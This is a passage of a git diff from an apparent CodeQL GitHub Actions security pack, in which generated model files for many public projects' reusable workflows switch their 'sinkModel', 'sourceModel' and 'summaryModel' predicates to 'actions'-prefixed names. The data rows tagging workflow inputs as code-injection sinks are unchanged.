"code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index aa432107a0d..c89d1c808c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 40053c68c1a..0258c79e83f 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 645ec756783..ebeba1eb226 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5..5f709385839 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe..e96dbba0699 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c..2a7a9afd5a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d16..5094422f3fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f..dff83745645 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3..88b68dc4ea7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830..18c6974c74f 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e15..561c3e15e64 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd7..961741f413f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa..985652a265b 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be17..3103913ab4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e8524..b89c1307d2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8ee..9e60cc61bb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef..cac4e298538 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f..eb2669a96ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89..590e518d350 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145..d55af595b1c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c961..1fd6cd394bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749d..3583052045b 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde..f355ceee6da 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946..2b9190c87af 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a8248853..783ff3c0468 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a..de853d30588 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c..31f09278ecd 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 40549844d38..d45a2e2a03a 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b367..896400bf2f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c..ade06c90c26 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed..f4c2d488ba3 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f..8a11ced42d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0..4c018b20f22 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c672170025..315c85efeb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b615..8a3132d5258 100644 
--- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a723906..9a669c8c009 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f..0ecb817822c 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c45..e4590eeec8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ea..ea0ddad0697 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e2..9352f766e82 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0d..d436644f4ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b..c6c01abca90 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] 
@@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5..8a9f76e7e52 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a4..8b3cfebc67b 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file 
